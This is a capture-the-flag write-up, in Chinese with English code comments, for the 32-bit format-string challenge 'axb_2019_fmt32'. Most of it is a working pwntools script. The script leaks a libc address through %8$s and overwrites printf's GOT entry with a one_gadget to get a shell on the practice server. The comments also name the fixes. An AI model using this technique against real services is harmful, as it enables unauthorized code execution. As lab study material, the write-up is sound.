axb_2019_fmt32
查看保护
可以改got的格式化漏洞
测试得到偏移为 8，但差一个字符对齐，所以 payload 前面加一个 a 即可。泄露出 libc 地址后，把 printf 的 GOT 表项改为 one_gadget。
fmtstr_payload 中的 numbwritten 参数为已经输出的字符个数，这里是 0xa。
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
# debug == 1 talks to the remote instance, 0 runs the local binary under pwntools.
# NOTE(review): the flag name is inverted (debug selects *remote*); kept as-is so the
# rest of the script keeps working.
debug = 1
r = remote('node4.buuoj.cn', 26501) if debug else process(file_name)
elf = ELF(file_name)   # target binary; used below for its GOT addresses
def dbg():
    """Attach gdb to the module-level tube ``r`` (not called anywhere in the visible script)."""
    target = r
    gdb.attach(target)
# Root cause being exercised: the service passes the user's input to printf as the
# format string, and the GOT is writable (the writeup notes the GOT can be modified,
# i.e. no Full RELRO). printf("%s", buf) instead of printf(buf), or linking with
# Full RELRO / FORTIFY_SOURCE, would stop this sequence.
read_got = elf.got['read']        # address of read's GOT slot: what the leak dereferences
printf_got = elf.got['printf']    # address of printf's GOT slot: the write target
offest = 8                        # format-string argument index of the input buffer (found empirically, see writeup)
# Leak: one byte of padding aligns the address at argument 8; %8$s then prints the
# bytes stored at read_got, i.e. the resolved libc address of read.
p1 = b'a' + p32(read_got) + b'%8$s'
r.sendlineafter('Please tell me:', p1)
# NOTE(review): fragile — assumes the 4 leaked bytes end exactly at byte 18 of the
# reply and that the leaked pointer contains no NUL (a %s leak stops at the first zero byte).
read_addr = u32(r.recv(18)[-4:])
success('read_addr = ' + hex(read_addr))
libc = ELF('libc-2.23.so')        # local copy of the target's libc; all offsets below are for this build
libc_base = read_addr - libc.sym['read']
# Candidate one_gadget offsets for this libc; only one[2] is used below.
one = [0x3a81c, 0x3a81e, 0x3a812, 0x3a819, 0x5f065, 0x5f066]
one_gadget = one[2] + libc_base
system_addr = libc_base + libc.sym['system']   # computed but never used
# Write: fmtstr_payload builds the format string that stores one_gadget into printf's
# GOT slot. numbwritten=0xa is the number of characters the program has already
# printed before the payload (see writeup); the leading b'a' is the same alignment pad.
p2 = b'a' + fmtstr_payload(offest, {printf_got: one_gadget}, numbwritten = 0xa)
r.sendlineafter('Please tell me:', p2)
# The next call through printf's GOT entry lands on the gadget; hand the tube to the user.
r.interactive()